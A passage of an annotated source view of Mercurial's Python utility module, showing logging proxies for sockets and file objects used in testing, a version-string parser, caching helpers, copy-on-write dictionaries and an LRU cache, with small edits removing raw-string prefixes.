619 619 ``os.read()`` events. It also re-publishes other events, such as
620 620 ``read()`` and ``readline()``.
621 621 """
622 622
623 623 def _fillbuffer(self):
624 624 res = super(observedbufferedinputpipe, self)._fillbuffer()
625 625
626 fn = getattr(self._input._observer, r'osread', None)
626 fn = getattr(self._input._observer, 'osread', None)
627 627 if fn:
628 628 fn(res, _chunksize)
629 629
630 630 return res
631 631
632 632 # We use different observer methods because the operation isn't
633 633 # performed on the actual file object but on us.
634 634 def read(self, size):
635 635 res = super(observedbufferedinputpipe, self).read(size)
636 636
637 fn = getattr(self._input._observer, r'bufferedread', None)
637 fn = getattr(self._input._observer, 'bufferedread', None)
638 638 if fn:
639 639 fn(res, size)
640 640
641 641 return res
642 642
643 643 def readline(self, *args, **kwargs):
644 644 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
645 645
646 fn = getattr(self._input._observer, r'bufferedreadline', None)
646 fn = getattr(self._input._observer, 'bufferedreadline', None)
647 647 if fn:
648 648 fn(res)
649 649
650 650 return res
651 651
652 652
653 653 PROXIED_SOCKET_METHODS = {
654 654 r'makefile',
655 655 r'recv',
656 656 r'recvfrom',
657 657 r'recvfrom_into',
658 658 r'recv_into',
659 659 r'send',
660 660 r'sendall',
661 661 r'sendto',
662 662 r'setblocking',
663 663 r'settimeout',
664 664 r'gettimeout',
665 665 r'setsockopt',
666 666 }
667 667
668 668
669 669 class socketproxy(object):
670 670 """A proxy around a socket that tells a watcher when events occur.
671 671
672 672 This is like ``fileobjectproxy`` except for sockets.
673 673
674 674 This type is intended to only be used for testing purposes. Think hard
675 675 before using it in important code.
676 676 """
677 677
678 678 __slots__ = (
679 679 r'_orig',
680 680 r'_observer',
681 681 )
682 682
683 683 def __init__(self, sock, observer):
684 684 object.__setattr__(self, r'_orig', sock)
685 685 object.__setattr__(self, r'_observer', observer)
686 686
687 687 def __getattribute__(self, name):
688 688 if name in PROXIED_SOCKET_METHODS:
689 689 return object.__getattribute__(self, name)
690 690
691 691 return getattr(object.__getattribute__(self, r'_orig'), name)
692 692
693 693 def __delattr__(self, name):
694 694 return delattr(object.__getattribute__(self, r'_orig'), name)
695 695
696 696 def __setattr__(self, name, value):
697 697 return setattr(object.__getattribute__(self, r'_orig'), name, value)
698 698
699 699 def __nonzero__(self):
700 700 return bool(object.__getattribute__(self, r'_orig'))
701 701
702 702 __bool__ = __nonzero__
703 703
704 704 def _observedcall(self, name, *args, **kwargs):
705 705 # Call the original object.
706 706 orig = object.__getattribute__(self, r'_orig')
707 707 res = getattr(orig, name)(*args, **kwargs)
708 708
709 709 # Call a method on the observer of the same name with arguments
710 710 # so it can react, log, etc.
711 711 observer = object.__getattribute__(self, r'_observer')
712 712 fn = getattr(observer, name, None)
713 713 if fn:
714 714 fn(res, *args, **kwargs)
715 715
716 716 return res
717 717
718 718 def makefile(self, *args, **kwargs):
719 719 res = object.__getattribute__(self, r'_observedcall')(
720 720 r'makefile', *args, **kwargs
721 721 )
722 722
723 723 # The file object may be used for I/O. So we turn it into a
724 724 # proxy using our observer.
725 725 observer = object.__getattribute__(self, r'_observer')
726 726 return makeloggingfileobject(
727 727 observer.fh,
728 728 res,
729 729 observer.name,
730 730 reads=observer.reads,
731 731 writes=observer.writes,
732 732 logdata=observer.logdata,
733 733 logdataapis=observer.logdataapis,
734 734 )
735 735
736 736 def recv(self, *args, **kwargs):
737 737 return object.__getattribute__(self, r'_observedcall')(
738 738 r'recv', *args, **kwargs
739 739 )
740 740
741 741 def recvfrom(self, *args, **kwargs):
742 742 return object.__getattribute__(self, r'_observedcall')(
743 743 r'recvfrom', *args, **kwargs
744 744 )
745 745
746 746 def recvfrom_into(self, *args, **kwargs):
747 747 return object.__getattribute__(self, r'_observedcall')(
748 748 r'recvfrom_into', *args, **kwargs
749 749 )
750 750
751 751 def recv_into(self, *args, **kwargs):
752 752 return object.__getattribute__(self, r'_observedcall')(
753 753 r'recv_info', *args, **kwargs
754 754 )
755 755
756 756 def send(self, *args, **kwargs):
757 757 return object.__getattribute__(self, r'_observedcall')(
758 758 r'send', *args, **kwargs
759 759 )
760 760
761 761 def sendall(self, *args, **kwargs):
762 762 return object.__getattribute__(self, r'_observedcall')(
763 763 r'sendall', *args, **kwargs
764 764 )
765 765
766 766 def sendto(self, *args, **kwargs):
767 767 return object.__getattribute__(self, r'_observedcall')(
768 768 r'sendto', *args, **kwargs
769 769 )
770 770
771 771 def setblocking(self, *args, **kwargs):
772 772 return object.__getattribute__(self, r'_observedcall')(
773 773 r'setblocking', *args, **kwargs
774 774 )
775 775
776 776 def settimeout(self, *args, **kwargs):
777 777 return object.__getattribute__(self, r'_observedcall')(
778 778 r'settimeout', *args, **kwargs
779 779 )
780 780
781 781 def gettimeout(self, *args, **kwargs):
782 782 return object.__getattribute__(self, r'_observedcall')(
783 783 r'gettimeout', *args, **kwargs
784 784 )
785 785
786 786 def setsockopt(self, *args, **kwargs):
787 787 return object.__getattribute__(self, r'_observedcall')(
788 788 r'setsockopt', *args, **kwargs
789 789 )
790 790
791 791
792 792 class baseproxyobserver(object):
793 793 def _writedata(self, data):
794 794 if not self.logdata:
795 795 if self.logdataapis:
796 796 self.fh.write(b'\n')
797 797 self.fh.flush()
798 798 return
799 799
800 800 # Simple case writes all data on a single line.
801 801 if b'\n' not in data:
802 802 if self.logdataapis:
803 803 self.fh.write(b': %s\n' % stringutil.escapestr(data))
804 804 else:
805 805 self.fh.write(
806 806 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
807 807 )
808 808 self.fh.flush()
809 809 return
810 810
811 811 # Data with newlines is written to multiple lines.
812 812 if self.logdataapis:
813 813 self.fh.write(b':\n')
814 814
815 815 lines = data.splitlines(True)
816 816 for line in lines:
817 817 self.fh.write(
818 818 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
819 819 )
820 820 self.fh.flush()
821 821
822 822
823 823 class fileobjectobserver(baseproxyobserver):
824 824 """Logs file object activity."""
825 825
826 826 def __init__(
827 827 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
828 828 ):
829 829 self.fh = fh
830 830 self.name = name
831 831 self.logdata = logdata
832 832 self.logdataapis = logdataapis
833 833 self.reads = reads
834 834 self.writes = writes
835 835
836 836 def read(self, res, size=-1):
837 837 if not self.reads:
838 838 return
839 839 # Python 3 can return None from reads at EOF instead of empty strings.
840 840 if res is None:
841 841 res = b''
842 842
843 843 if size == -1 and res == b'':
844 844 # Suppress pointless read(-1) calls that return
845 845 # nothing. These happen _a lot_ on Python 3, and there
846 846 # doesn't seem to be a better workaround to have matching
847 847 # Python 2 and 3 behavior. :(
848 848 return
849 849
850 850 if self.logdataapis:
851 851 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
852 852
853 853 self._writedata(res)
854 854
855 855 def readline(self, res, limit=-1):
856 856 if not self.reads:
857 857 return
858 858
859 859 if self.logdataapis:
860 860 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
861 861
862 862 self._writedata(res)
863 863
864 864 def readinto(self, res, dest):
865 865 if not self.reads:
866 866 return
867 867
868 868 if self.logdataapis:
869 869 self.fh.write(
870 870 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
871 871 )
872 872
873 873 data = dest[0:res] if res is not None else b''
874 874
875 875 # _writedata() uses "in" operator and is confused by memoryview because
876 876 # characters are ints on Python 3.
877 877 if isinstance(data, memoryview):
878 878 data = data.tobytes()
879 879
880 880 self._writedata(data)
881 881
882 882 def write(self, res, data):
883 883 if not self.writes:
884 884 return
885 885
886 886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
887 887 # returns the integer bytes written.
888 888 if res is None and data:
889 889 res = len(data)
890 890
891 891 if self.logdataapis:
892 892 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
893 893
894 894 self._writedata(data)
895 895
896 896 def flush(self, res):
897 897 if not self.writes:
898 898 return
899 899
900 900 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
901 901
902 902 # For observedbufferedinputpipe.
903 903 def bufferedread(self, res, size):
904 904 if not self.reads:
905 905 return
906 906
907 907 if self.logdataapis:
908 908 self.fh.write(
909 909 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
910 910 )
911 911
912 912 self._writedata(res)
913 913
914 914 def bufferedreadline(self, res):
915 915 if not self.reads:
916 916 return
917 917
918 918 if self.logdataapis:
919 919 self.fh.write(
920 920 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
921 921 )
922 922
923 923 self._writedata(res)
924 924
925 925
926 926 def makeloggingfileobject(
927 927 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
928 928 ):
929 929 """Turn a file object into a logging file object."""
930 930
931 931 observer = fileobjectobserver(
932 932 logh,
933 933 name,
934 934 reads=reads,
935 935 writes=writes,
936 936 logdata=logdata,
937 937 logdataapis=logdataapis,
938 938 )
939 939 return fileobjectproxy(fh, observer)
940 940
941 941
942 942 class socketobserver(baseproxyobserver):
943 943 """Logs socket activity."""
944 944
945 945 def __init__(
946 946 self,
947 947 fh,
948 948 name,
949 949 reads=True,
950 950 writes=True,
951 951 states=True,
952 952 logdata=False,
953 953 logdataapis=True,
954 954 ):
955 955 self.fh = fh
956 956 self.name = name
957 957 self.reads = reads
958 958 self.writes = writes
959 959 self.states = states
960 960 self.logdata = logdata
961 961 self.logdataapis = logdataapis
962 962
963 963 def makefile(self, res, mode=None, bufsize=None):
964 964 if not self.states:
965 965 return
966 966
967 967 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
968 968
969 969 def recv(self, res, size, flags=0):
970 970 if not self.reads:
971 971 return
972 972
973 973 if self.logdataapis:
974 974 self.fh.write(
975 975 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
976 976 )
977 977 self._writedata(res)
978 978
979 979 def recvfrom(self, res, size, flags=0):
980 980 if not self.reads:
981 981 return
982 982
983 983 if self.logdataapis:
984 984 self.fh.write(
985 985 b'%s> recvfrom(%d, %d) -> %d'
986 986 % (self.name, size, flags, len(res[0]))
987 987 )
988 988
989 989 self._writedata(res[0])
990 990
991 991 def recvfrom_into(self, res, buf, size, flags=0):
992 992 if not self.reads:
993 993 return
994 994
995 995 if self.logdataapis:
996 996 self.fh.write(
997 997 b'%s> recvfrom_into(%d, %d) -> %d'
998 998 % (self.name, size, flags, res[0])
999 999 )
1000 1000
1001 1001 self._writedata(buf[0 : res[0]])
1002 1002
1003 1003 def recv_into(self, res, buf, size=0, flags=0):
1004 1004 if not self.reads:
1005 1005 return
1006 1006
1007 1007 if self.logdataapis:
1008 1008 self.fh.write(
1009 1009 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1010 1010 )
1011 1011
1012 1012 self._writedata(buf[0:res])
1013 1013
1014 1014 def send(self, res, data, flags=0):
1015 1015 if not self.writes:
1016 1016 return
1017 1017
1018 1018 self.fh.write(
1019 1019 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1020 1020 )
1021 1021 self._writedata(data)
1022 1022
1023 1023 def sendall(self, res, data, flags=0):
1024 1024 if not self.writes:
1025 1025 return
1026 1026
1027 1027 if self.logdataapis:
1028 1028 # Returns None on success. So don't bother reporting return value.
1029 1029 self.fh.write(
1030 1030 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1031 1031 )
1032 1032
1033 1033 self._writedata(data)
1034 1034
1035 1035 def sendto(self, res, data, flagsoraddress, address=None):
1036 1036 if not self.writes:
1037 1037 return
1038 1038
1039 1039 if address:
1040 1040 flags = flagsoraddress
1041 1041 else:
1042 1042 flags = 0
1043 1043
1044 1044 if self.logdataapis:
1045 1045 self.fh.write(
1046 1046 b'%s> sendto(%d, %d, %r) -> %d'
1047 1047 % (self.name, len(data), flags, address, res)
1048 1048 )
1049 1049
1050 1050 self._writedata(data)
1051 1051
1052 1052 def setblocking(self, res, flag):
1053 1053 if not self.states:
1054 1054 return
1055 1055
1056 1056 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1057 1057
1058 1058 def settimeout(self, res, value):
1059 1059 if not self.states:
1060 1060 return
1061 1061
1062 1062 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1063 1063
1064 1064 def gettimeout(self, res):
1065 1065 if not self.states:
1066 1066 return
1067 1067
1068 1068 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1069 1069
1070 1070 def setsockopt(self, res, level, optname, value):
1071 1071 if not self.states:
1072 1072 return
1073 1073
1074 1074 self.fh.write(
1075 1075 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1076 1076 % (self.name, level, optname, value, res)
1077 1077 )
1078 1078
1079 1079
1080 1080 def makeloggingsocket(
1081 1081 logh,
1082 1082 fh,
1083 1083 name,
1084 1084 reads=True,
1085 1085 writes=True,
1086 1086 states=True,
1087 1087 logdata=False,
1088 1088 logdataapis=True,
1089 1089 ):
1090 1090 """Turn a socket into a logging socket."""
1091 1091
1092 1092 observer = socketobserver(
1093 1093 logh,
1094 1094 name,
1095 1095 reads=reads,
1096 1096 writes=writes,
1097 1097 states=states,
1098 1098 logdata=logdata,
1099 1099 logdataapis=logdataapis,
1100 1100 )
1101 1101 return socketproxy(fh, observer)
1102 1102
1103 1103
1104 1104 def version():
1105 1105 """Return version information if available."""
1106 1106 try:
1107 1107 from . import __version__
1108 1108
1109 1109 return __version__.version
1110 1110 except ImportError:
1111 1111 return b'unknown'
1112 1112
1113 1113
1114 1114 def versiontuple(v=None, n=4):
1115 1115 """Parses a Mercurial version string into an N-tuple.
1116 1116
1117 1117 The version string to be parsed is specified with the ``v`` argument.
1118 1118 If it isn't defined, the current Mercurial version string will be parsed.
1119 1119
1120 1120 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1121 1121 returned values:
1122 1122
1123 1123 >>> v = b'3.6.1+190-df9b73d2d444'
1124 1124 >>> versiontuple(v, 2)
1125 1125 (3, 6)
1126 1126 >>> versiontuple(v, 3)
1127 1127 (3, 6, 1)
1128 1128 >>> versiontuple(v, 4)
1129 1129 (3, 6, 1, '190-df9b73d2d444')
1130 1130
1131 1131 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1132 1132 (3, 6, 1, '190-df9b73d2d444+20151118')
1133 1133
1134 1134 >>> v = b'3.6'
1135 1135 >>> versiontuple(v, 2)
1136 1136 (3, 6)
1137 1137 >>> versiontuple(v, 3)
1138 1138 (3, 6, None)
1139 1139 >>> versiontuple(v, 4)
1140 1140 (3, 6, None, None)
1141 1141
1142 1142 >>> v = b'3.9-rc'
1143 1143 >>> versiontuple(v, 2)
1144 1144 (3, 9)
1145 1145 >>> versiontuple(v, 3)
1146 1146 (3, 9, None)
1147 1147 >>> versiontuple(v, 4)
1148 1148 (3, 9, None, 'rc')
1149 1149
1150 1150 >>> v = b'3.9-rc+2-02a8fea4289b'
1151 1151 >>> versiontuple(v, 2)
1152 1152 (3, 9)
1153 1153 >>> versiontuple(v, 3)
1154 1154 (3, 9, None)
1155 1155 >>> versiontuple(v, 4)
1156 1156 (3, 9, None, 'rc+2-02a8fea4289b')
1157 1157
1158 1158 >>> versiontuple(b'4.6rc0')
1159 1159 (4, 6, None, 'rc0')
1160 1160 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1161 1161 (4, 6, None, 'rc0+12-425d55e54f98')
1162 1162 >>> versiontuple(b'.1.2.3')
1163 1163 (None, None, None, '.1.2.3')
1164 1164 >>> versiontuple(b'12.34..5')
1165 1165 (12, 34, None, '..5')
1166 1166 >>> versiontuple(b'1.2.3.4.5.6')
1167 1167 (1, 2, 3, '.4.5.6')
1168 1168 """
1169 1169 if not v:
1170 1170 v = version()
1171 1171 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1172 1172 if not m:
1173 1173 vparts, extra = b'', v
1174 1174 elif m.group(2):
1175 1175 vparts, extra = m.groups()
1176 1176 else:
1177 1177 vparts, extra = m.group(1), None
1178 1178
1179 1179 vints = []
1180 1180 for i in vparts.split(b'.'):
1181 1181 try:
1182 1182 vints.append(int(i))
1183 1183 except ValueError:
1184 1184 break
1185 1185 # (3, 6) -> (3, 6, None)
1186 1186 while len(vints) < 3:
1187 1187 vints.append(None)
1188 1188
1189 1189 if n == 2:
1190 1190 return (vints[0], vints[1])
1191 1191 if n == 3:
1192 1192 return (vints[0], vints[1], vints[2])
1193 1193 if n == 4:
1194 1194 return (vints[0], vints[1], vints[2], extra)
1195 1195
1196 1196
1197 1197 def cachefunc(func):
1198 1198 '''cache the result of function calls'''
1199 1199 # XXX doesn't handle keywords args
1200 1200 if func.__code__.co_argcount == 0:
1201 1201 cache = []
1202 1202
1203 1203 def f():
1204 1204 if len(cache) == 0:
1205 1205 cache.append(func())
1206 1206 return cache[0]
1207 1207
1208 1208 return f
1209 1209 cache = {}
1210 1210 if func.__code__.co_argcount == 1:
1211 1211 # we gain a small amount of time because
1212 1212 # we don't need to pack/unpack the list
1213 1213 def f(arg):
1214 1214 if arg not in cache:
1215 1215 cache[arg] = func(arg)
1216 1216 return cache[arg]
1217 1217
1218 1218 else:
1219 1219
1220 1220 def f(*args):
1221 1221 if args not in cache:
1222 1222 cache[args] = func(*args)
1223 1223 return cache[args]
1224 1224
1225 1225 return f
1226 1226
1227 1227
1228 1228 class cow(object):
1229 1229 """helper class to make copy-on-write easier
1230 1230
1231 1231 Call preparewrite before doing any writes.
1232 1232 """
1233 1233
1234 1234 def preparewrite(self):
1235 1235 """call this before writes, return self or a copied new object"""
1236 1236 if getattr(self, '_copied', 0):
1237 1237 self._copied -= 1
1238 1238 return self.__class__(self)
1239 1239 return self
1240 1240
1241 1241 def copy(self):
1242 1242 """always do a cheap copy"""
1243 1243 self._copied = getattr(self, '_copied', 0) + 1
1244 1244 return self
1245 1245
1246 1246
1247 1247 class sortdict(collections.OrderedDict):
1248 1248 '''a simple sorted dictionary
1249 1249
1250 1250 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1251 1251 >>> d2 = d1.copy()
1252 1252 >>> d2
1253 1253 sortdict([('a', 0), ('b', 1)])
1254 1254 >>> d2.update([(b'a', 2)])
1255 1255 >>> list(d2.keys()) # should still be in last-set order
1256 1256 ['b', 'a']
1257 1257 '''
1258 1258
1259 1259 def __setitem__(self, key, value):
1260 1260 if key in self:
1261 1261 del self[key]
1262 1262 super(sortdict, self).__setitem__(key, value)
1263 1263
1264 1264 if pycompat.ispypy:
1265 1265 # __setitem__() isn't called as of PyPy 5.8.0
1266 1266 def update(self, src):
1267 1267 if isinstance(src, dict):
1268 1268 src = src.iteritems()
1269 1269 for k, v in src:
1270 1270 self[k] = v
1271 1271
1272 1272
1273 1273 class cowdict(cow, dict):
1274 1274 """copy-on-write dict
1275 1275
1276 1276 Be sure to call d = d.preparewrite() before writing to d.
1277 1277
1278 1278 >>> a = cowdict()
1279 1279 >>> a is a.preparewrite()
1280 1280 True
1281 1281 >>> b = a.copy()
1282 1282 >>> b is a
1283 1283 True
1284 1284 >>> c = b.copy()
1285 1285 >>> c is a
1286 1286 True
1287 1287 >>> a = a.preparewrite()
1288 1288 >>> b is a
1289 1289 False
1290 1290 >>> a is a.preparewrite()
1291 1291 True
1292 1292 >>> c = c.preparewrite()
1293 1293 >>> b is c
1294 1294 False
1295 1295 >>> b is b.preparewrite()
1296 1296 True
1297 1297 """
1298 1298
1299 1299
1300 1300 class cowsortdict(cow, sortdict):
1301 1301 """copy-on-write sortdict
1302 1302
1303 1303 Be sure to call d = d.preparewrite() before writing to d.
1304 1304 """
1305 1305
1306 1306
1307 1307 class transactional(object):
1308 1308 """Base class for making a transactional type into a context manager."""
1309 1309
1310 1310 __metaclass__ = abc.ABCMeta
1311 1311
1312 1312 @abc.abstractmethod
1313 1313 def close(self):
1314 1314 """Successfully closes the transaction."""
1315 1315
1316 1316 @abc.abstractmethod
1317 1317 def release(self):
1318 1318 """Marks the end of the transaction.
1319 1319
1320 1320 If the transaction has not been closed, it will be aborted.
1321 1321 """
1322 1322
1323 1323 def __enter__(self):
1324 1324 return self
1325 1325
1326 1326 def __exit__(self, exc_type, exc_val, exc_tb):
1327 1327 try:
1328 1328 if exc_type is None:
1329 1329 self.close()
1330 1330 finally:
1331 1331 self.release()
1332 1332
1333 1333
1334 1334 @contextlib.contextmanager
1335 1335 def acceptintervention(tr=None):
1336 1336 """A context manager that closes the transaction on InterventionRequired
1337 1337
1338 1338 If no transaction was provided, this simply runs the body and returns
1339 1339 """
1340 1340 if not tr:
1341 1341 yield
1342 1342 return
1343 1343 try:
1344 1344 yield
1345 1345 tr.close()
1346 1346 except error.InterventionRequired:
1347 1347 tr.close()
1348 1348 raise
1349 1349 finally:
1350 1350 tr.release()
1351 1351
1352 1352
1353 1353 @contextlib.contextmanager
1354 1354 def nullcontextmanager():
1355 1355 yield
1356 1356
1357 1357
1358 1358 class _lrucachenode(object):
1359 1359 """A node in a doubly linked list.
1360 1360
1361 1361 Holds a reference to nodes on either side as well as a key-value
1362 1362 pair for the dictionary entry.
1363 1363 """
1364 1364
1365 1365 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1366 1366
1367 1367 def __init__(self):
1368 1368 self.next = None
1369 1369 self.prev = None
1370 1370
1371 1371 self.key = _notset
1372 1372 self.value = None
1373 1373 self.cost = 0
1374 1374
1375 1375 def markempty(self):
1376 1376 """Mark the node as emptied."""
1377 1377 self.key = _notset
1378 1378 self.value = None
1379 1379 self.cost = 0
1380 1380
1381 1381
1382 1382 class lrucachedict(object):
1383 1383 """Dict that caches most recent accesses and sets.
1384 1384
1385 1385 The dict consists of an actual backing dict - indexed by original
1386 1386 key - and a doubly linked circular list defining the order of entries in
1387 1387 the cache.
1388 1388
1389 1389 The head node is the newest entry in the cache. If the cache is full,
1390 1390 we recycle head.prev and make it the new head. Cache accesses result in
1391 1391 the node being moved to before the existing head and being marked as the
1392 1392 new head node.
1393 1393
1394 1394 Items in the cache can be inserted with an optional "cost" value. This is
1395 1395 simply an integer that is specified by the caller. The cache can be queried
1396 1396 for the total cost of all items presently in the cache.
1397 1397
1398 1398 The cache can also define a maximum cost. If a cache insertion would
1399 1399 cause the total cost of the cache to go beyond the maximum cost limit,
1400 1400 nodes will be evicted to make room for the new code. This can be used
1401 1401 to e.g. set a max memory limit and associate an estimated bytes size
1402 1402 cost to each item in the cache. By default, no maximum cost is enforced.
1403 1403 """
1404 1404
1405 1405 def __init__(self, max, maxcost=0):
1406 1406 self._cache = {}
1407 1407
1408 1408 self._head = head = _lrucachenode()
1409 1409 head.prev = head
1410 1410 head.next = head
1411 1411 self._size = 1
1412 1412 self.capacity = max
1413 1413 self.totalcost = 0
1414 1414 self.maxcost = maxcost
1415 1415
1416 1416 def __len__(self):
1417 1417 return len(self._cache)
1418 1418
1419 1419 def __contains__(self, k):
1420 1420 return k in self._cache
1421 1421
1422 1422 def __iter__(self):
1423 1423 # We don't have to iterate in cache order, but why not.
1424 1424 n = self._head
1425 1425 for i in range(len(self._cache)):
1426 1426 yield n.key
1427 1427 n = n.next
1428 1428
1429 1429 def __getitem__(self, k):
1430 1430 node = self._cache[k]
1431 1431 self._movetohead(node)
1432 1432 return node.value
1433 1433
1434 1434 def insert(self, k, v, cost=0):
1435 1435 """Insert a new item in the cache with optional cost value."""
1436 1436 node = self._cache.get(k)
1437 1437 # Replace existing value and mark as newest.
1438 1438 if node is not None:
1439 1439 self.totalcost -= node.cost
1440 1440 node.value = v
1441 1441 node.cost = cost
1442 1442 self.totalcost += cost
1443 1443 self._movetohead(node)
1444 1444
1445 1445 if self.maxcost:
1446 1446 self._enforcecostlimit()
1447 1447
1448 1448 return
1449 1449
1450 1450 if self._size < self.capacity:
1451 1451 node = self._addcapacity()
1452 1452 else:
1453 1453 # Grab the last/oldest item.
1454 1454 node = self._head.prev
1455 1455
1456 1456 # At capacity. Kill the old entry.
1457 1457 if node.key is not _notset:
1458 1458 self.totalcost -= node.cost
1459 1459 del self._cache[node.key]
1460 1460
1461 1461 node.key = k
1462 1462 node.value = v
1463 1463 node.cost = cost
1464 1464 self.totalcost += cost
1465 1465 self._cache[k] = node
1466 1466 # And mark it as newest entry. No need to adjust order since it
1467 1467 # is already self._head.prev.
1468 1468 self._head = node
1469 1469
1470 1470 if self.maxcost:
1471 1471 self._enforcecostlimit()
1472 1472
1473 1473 def __setitem__(self, k, v):
1474 1474 self.insert(k, v)
1475 1475
1476 1476 def __delitem__(self, k):
1477 1477 self.pop(k)
1478 1478
1479 1479 def pop(self, k, default=_notset):
1480 1480 try:
1481 1481 node = self._cache.pop(k)
1482 1482 except KeyError:
1483 1483 if default is _notset:
1484 1484 raise
1485 1485 return default
1486 1486 value = node.value
1487 1487 self.totalcost -= node.cost
1488 1488 node.markempty()
1489 1489
1490 1490 # Temporarily mark as newest item before re-adjusting head to make
1491 1491 # this node the oldest item.
1492 1492 self._movetohead(node)
1493 1493 self._head = node.next
1494 1494
1495 1495 return value
1496 1496
1497 1497 # Additional dict methods.
1498 1498
1499 1499 def get(self, k, default=None):
1500 1500 try:
1501 1501 return self.__getitem__(k)
1502 1502 except KeyError:
1503 1503 return default
1504 1504
1505 1505 def peek(self, k, default=_notset):
1506 1506 """Get the specified item without moving it to the head
1507 1507
1508 1508 Unlike get(), this doesn't mutate the internal state. But be aware
1509 1509 that it doesn't mean peek() is thread safe.
1510 1510 """
1511 1511 try:
1512 1512 node = self._cache[k]
1513 1513 return node.value
1514 1514 except KeyError:
1515 1515 if default is _notset:
1516 1516 raise
1517 1517 return default
1518 1518
1519 1519 def clear(self):
1520 1520 n = self._head
1521 1521 while n.key is not _notset:
1522 1522 self.totalcost -= n.cost
1523 1523 n.markempty()
1524 1524 n = n.next
1525 1525
1526 1526 self._cache.clear()
1527 1527
1528 1528 def copy(self, capacity=None, maxcost=0):
1529 1529 """Create a new cache as a copy of the current one.
1530 1530
1531 1531 By default, the new cache has the same capacity as the existing one.
1532 1532 But, the cache capacity can be changed as part of performing the
1533 1533 copy.
1534 1534
1535 1535 Items in the copy have an insertion/access order matching this
1536 1536 instance.
1537 1537 """
1538 1538
1539 1539 capacity = capacity or self.capacity
1540 1540 maxcost = maxcost or self.maxcost
1541 1541 result = lrucachedict(capacity, maxcost=maxcost)
1542 1542
1543 1543 # We copy entries by iterating in oldest-to-newest order so the copy
1544 1544 # has the correct ordering.
1545 1545
1546 1546 # Find the first non-empty entry.
1547 1547 n = self._head.prev
1548 1548 while n.key is _notset and n is not self._head:
1549 1549 n = n.prev
1550 1550
1551 1551 # We could potentially skip the first N items when decreasing capacity.
1552 1552 # But let's keep it simple unless it is a performance problem.
1553 1553 for i in range(len(self._cache)):
1554 1554 result.insert(n.key, n.value, cost=n.cost)
1555 1555 n = n.prev
1556 1556
1557 1557 return result
1558 1558
1559 1559 def popoldest(self):
1560 1560 """Remove the oldest item from the cache.
1561 1561
1562 1562 Returns the (key, value) describing the removed cache entry.
1563 1563 """
1564 1564 if not self._cache:
1565 1565 return
1566 1566
1567 1567 # Walk the linked list backwards starting at tail node until we hit
1568 1568 # a non-empty node.
1569 1569 n = self._head.prev
1570 1570 while n.key is _notset:
1571 1571 n = n.prev
1572 1572
1573 1573 key, value = n.key, n.value
1574 1574
1575 1575 # And remove it from the cache and mark it as empty.
1576 1576 del self._cache[n.key]
1577 1577 self.totalcost -= n.cost
1578 1578 n.markempty()
1579 1579
1580 1580 return key, value
1581 1581
1582 1582 def _movetohead(self, node):
1583 1583 """Mark a node as the newest, making it the new head.
1584 1584
1585 1585 When a node is accessed, it becomes the freshest entry in the LRU
1586 1586 list, which is denoted by self._head.
1587 1587
1588 1588 Visually, let's make ``N`` the new head node (* denotes head):
1589 1589
1590 1590 previous/oldest <-> head <-> next/next newest
1591 1591
1592 1592 ----<->--- A* ---<->-----
1593 1593 | |
1594 1594 E <-> D <-> N <-> C <-> B
1595 1595
1596 1596 To:
1597 1597
1598 1598 ----<->--- N* ---<->-----
1599 1599 | |
1600 1600 E <-> D <-> C <-> B <-> A
1601 1601
1602 1602 This requires the following moves:
1603 1603
1604 1604 C.next = D (node.prev.next = node.next)
1605 1605 D.prev = C (node.next.prev = node.prev)
1606 1606 E.next = N (head.prev.next = node)
1607 1607 N.prev = E (node.prev = head.prev)
1608 1608 N.next = A (node.next = head)
1609 1609 A.prev = N (head.prev = node)
1610 1610 """
1611 1611 head = self._head
1612 1612 # C.next = D
1613 1613 node.prev.next = node.next
1614 1614 # D.prev = C
1615 1615 node.next.prev = node.prev
1616 1616 # N.prev = E
1617 1617 node.prev = head.prev
1618 1618 # N.next = A
1619 1619 # It is tempting to do just "head" here, however if node is
1620 1620 # adjacent to head, this will do bad things.
1621 1621 node.next = head.prev.next
1622 1622 # E.next = N
1623 1623 node.next.prev = node
1624 1624 # A.prev = N
1625 1625 node.prev.next = node
1626 1626
1627 1627 self._head = node
1628 1628
1629 1629 def _addcapacity(self):
1630 1630 """Add a node to the circular linked list.
1631 1631
1632 1632 The new node is inserted before the head node.
1633 1633 """
1634 1634 head = self._head
1635 1635 node = _lrucachenode()
1636 1636 head.prev.next = node
1637 1637 node.prev = head.prev
1638 1638 node.next = head
1639 1639 head.prev = node
1640 1640 self._size += 1
1641 1641 return node
1642 1642
1643 1643 def _enforcecostlimit(self):
1644 1644 # This should run after an insertion. It should only be called if total
1645 1645 # cost limits are being enforced.
1646 1646 # The most recently inserted node is never evicted.
1647 1647 if len(self) <= 1 or self.totalcost <= self.maxcost:
1648 1648 return
1649 1649
1650 1650 # This is logically equivalent to calling popoldest() until we
1651 1651 # free up enough cost. We don't do that since popoldest() needs
1652 1652 # to walk the linked list and doing this in a loop would be
1653 1653 # quadratic. So we find the first non-empty node and then
1654 1654 # walk nodes until we free up enough capacity.
